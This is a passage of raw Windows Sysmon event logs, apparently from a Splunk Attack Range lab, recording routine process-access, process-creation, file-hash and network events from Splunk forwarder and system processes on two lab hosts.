12:23:22.655{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291446Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:22.655{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291445Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:22.655{BEA10069-D0C1-6086-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{BEA10069-023A-6088-F529-00000000BB01}6916C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291444Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:22.655{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-023A-6088-F529-00000000BB01}6916C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291443Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:22.656{BEA10069-023A-6088-F529-00000000BB01}6916C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000291473Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:23.688{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12545857E5C85647178EF4E8CF84A8F7,SHA256=2ECF3622607B7EB3DE7A0AE18EA72CE80AF4875453325B172A933D720E1CF018,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440273Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:19.558{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62398-false10.0.1.12-8000- 23542300x8000000000000000440272Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:23.295{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E8A6B51B07655F332CB928A8D73F6B0,SHA256=9502B31B3507DE488BED003425B45A99848EE7449802F39FCCFBC81B596E99DC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291472Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:21.450{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50615-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000291471Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:23.457{BEA10069-023B-6088-F629-00000000BB01}70724288C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291470Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:23.341{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A94B405BF6EF1435978698E2A9FA2938,SHA256=0330FEF047F5565EA093DCD80D0AD1B83106119AF0C5709E95AC56E22D0BD51F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291469Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:23.325{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-023B-6088-F629-00000000BB01}7072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291468Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:23.325{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291467Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:23.325{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291466Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:23.325{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291465Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:23.325{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291464Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:23.325{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291463Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:23.325{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291462Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:23.325{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291461Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:23.325{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291460Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:23.325{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291459Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:23.325{BEA10069-D0C1-6086-0500-00000000BB01}416952C:\Windows\system32\csrss.exe{BEA10069-023B-6088-F629-00000000BB01}7072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291458Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:23.325{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-023B-6088-F629-00000000BB01}7072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291457Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:23.326{BEA10069-023B-6088-F629-00000000BB01}7072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000440271Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:23.150{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440270Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:23.150{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291502Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.875{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31918E1410426F1545D149122F337938,SHA256=27B452E479527A205348EFFEBCDA8D99C7E769AA7CD0273170D770EDEEE922FF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291501Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.813{BEA10069-023C-6088-F829-00000000BB01}61283008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440277Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:24.528{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1066FA18BC9B787EBCE4C5C6B7BA7FE1,SHA256=B404980857EAA3FF1414030C568BBC06422C596EA48C28A8036FC390F24653A9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291500Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.691{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-023C-6088-F829-00000000BB01}6128C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291499Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:24.691{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291498Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 